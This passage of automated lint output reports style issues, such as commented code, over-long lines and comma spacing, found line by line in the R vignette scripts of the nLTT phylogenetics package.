^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:32:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_average_nltt.R#L32) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:33:1:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_average_nltt.R#L33) *style:* **lines should not be more than 80 characters.**\n```r\n​nLTT::stretch_nltt_matrix(nLTT::get_phylogeny_nltt_matrix(phylogeny1), dt = 0.20, step_type = \"upper\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:35:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_average_nltt.R#L35) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:36:1:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_average_nltt.R#L36) *style:* **lines should not be more than 80 characters.**\n```r\n​nLTT::stretch_nltt_matrix(nLTT::get_phylogeny_nltt_matrix(phylogeny2), dt = 0.20, step_type = \"upper\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:38:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_average_nltt.R#L38) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:41:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_average_nltt.R#L41) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:44:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_average_nltt.R#L44) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:46:1:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_average_nltt.R#L46) *style:* **lines should not be more than 80 characters.**\n```r\n​newick2 <- \"((((XD:1,ZD:1):1,CE:2):1,(FE:2,EE:2):1):4,((AE:1,BE:1):1,(WD:1,YD:1):1):5);\"\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:50:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_average_nltt.R#L50) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:52:1:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_average_nltt.R#L52) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​add.scale.bar()\n^~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:54:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_average_nltt.R#L54) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:57:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_average_nltt.R#L57) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:60:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_average_nltt.R#L60) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:62:1:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_average_nltt.R#L62) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​add.scale.bar()\n^~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:64:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_average_nltt.R#L64) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:67:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_average_nltt.R#L67) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:70:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_average_nltt.R#L70) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:71:1:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_average_nltt.R#L71) *style:* **lines should not be more than 80 characters.**\n```r\n​nLTT::stretch_nltt_matrix(nLTT::get_phylogeny_nltt_matrix(phylogeny1), dt = 0.20, step_type = \"upper\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:73:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_average_nltt.R#L73) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:74:1:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_average_nltt.R#L74) *style:* **lines should not be more than 80 characters.**\n```r\n​nLTT::stretch_nltt_matrix(nLTT::get_phylogeny_nltt_matrix(phylogeny2), dt = 0.20, step_type = \"upper\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:76:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_average_nltt.R#L76) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:79:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_average_nltt.R#L79) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:81:1:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_average_nltt.R#L81) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[inst/doc/vignette_get_nltt_values.R:1:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L1) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:4:9:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L4) *style:* **Variable and function names should be all lowercase.**\n```r\n​library(nLTT)\n        ^~~~\n```\n[inst/doc/vignette_get_nltt_values.R:8:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L8) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:15:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L15) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:17:1:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L17) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​add.scale.bar()\n^~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:19:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L19) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:22:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L22) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:26:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L26) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:28:1:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L28) *style:* **lines should not be more than 80 characters.**\n```r\n​qplot(time, N, data = df, geom = \"step\", ylim = c(0,1), direction = \"vh\", main = \"NLTT plot of phylogeny 1\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:28:53:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L28) *style:* **Commas should always have a space after.**\n```r\n​qplot(time, N, data = df, geom = \"step\", ylim = c(0,1), direction = \"vh\", main = \"NLTT plot of phylogeny 1\")\n                                                    ^\n```\n[inst/doc/vignette_get_nltt_values.R:30:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L30) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:32:1:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L32) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​add.scale.bar()\n^~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:34:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L34) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:37:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L37) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:41:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L41) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:43:1:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n​qplot(time, N, data = df, geom = \"step\", ylim = c(0,1), direction = \"vh\", main = \"NLTT plot of phylogeny 2\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:43:53:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L43) *style:* **Commas should always have a space after.**\n```r\n​qplot(time, N, data = df, geom = \"step\", ylim = c(0,1), direction = \"vh\", main = \"NLTT plot of phylogeny 2\")\n                                                    ^\n```\n[inst/doc/vignette_get_nltt_values.R:45:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L45) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:46:1:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L46) *style:* **lines should not be more than 80 characters.**\n```r\n​t <- nLTT::stretch_nltt_matrix(nLTT::get_phylogeny_nltt_matrix(phylogeny1), dt = 0.20, step_type = \"upper\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:49:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L49) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:50:1:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L50) *style:* **lines should not be more than 80 characters.**\n```r\n​t <- nLTT::stretch_nltt_matrix(nLTT::get_phylogeny_nltt_matrix(phylogeny2), dt = 0.20, step_type = \"upper\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:53:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L53) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:57:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L57) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:60:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L60) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:61:41:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L61) *style:* **Commas should always have a space after.**\n```r\n​t <- nLTT::get_nltt_values(c(phylogeny1,phylogeny2), dt = 0.2)\n                                        ^\n```\n[inst/doc/vignette_get_nltt_values.R:64:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L64) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:65:42:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L65) *style:* **Commas should always have a space after.**\n```r\n​df <- nLTT::get_nltt_values(c(phylogeny1,phylogeny2), dt = 0.01)\n                                         ^\n```\n[inst/doc/vignette_get_nltt_values.R:67:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L67) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:68:1:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L68) *style:* **lines should not be more than 80 characters.**\n```r\n​qplot(t, nltt, data = df, geom = \"point\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\", color = id, size = I(0.1)) + \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:68:54:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L68) *style:* **Commas should always have a space after.**\n```r\n​qplot(t, nltt, data = df, geom = \"point\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\", color = id, size = I(0.1)) + \n                                                     ^\n```\n[inst/doc/vignette_get_nltt_values.R:68:129:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L68) *style:* **Trailing whitespace is superfluous.**\n```r\n​qplot(t, nltt, data = df, geom = \"point\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\", color = id, size = I(0.1)) + \n                                                                                                                                ^\n```\n[inst/doc/vignette_get_nltt_values.R:71:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L71) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:72:1:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L72) *style:* **lines should not be more than 80 characters.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\") + \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:72:54:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L72) *style:* **Commas should always have a space after.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\") + \n                                                     ^\n```\n[inst/doc/vignette_get_nltt_values.R:72:102:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L72) *style:* **Trailing whitespace is superfluous.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\") + \n                                                                                                     ^\n```\n[inst/doc/vignette_get_nltt_values.R:75:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L75) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:77:1:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L77) *style:* **lines should not be more than 80 characters.**\n```r\n​newick2 <- \"((((XD:1,ZD:1):1,CE:2):1,(FE:2,EE:2):1):4,((AE:1,BE:1):1,(WD:1,YD:1):1):5);\"\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:82:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L82) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:84:1:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L84) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​add.scale.bar()\n^~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:86:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L86) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:89:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L89) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:93:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L93) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:95:1:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L95) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​add.scale.bar()\n^~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:97:2:](https://github.com/richelbilderbeek/nLTT/blob/569f0fb794b68cb41eb05cd28cd01a162600c98a/inst/doc/vignette_get_nltt_values.R#L97) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n 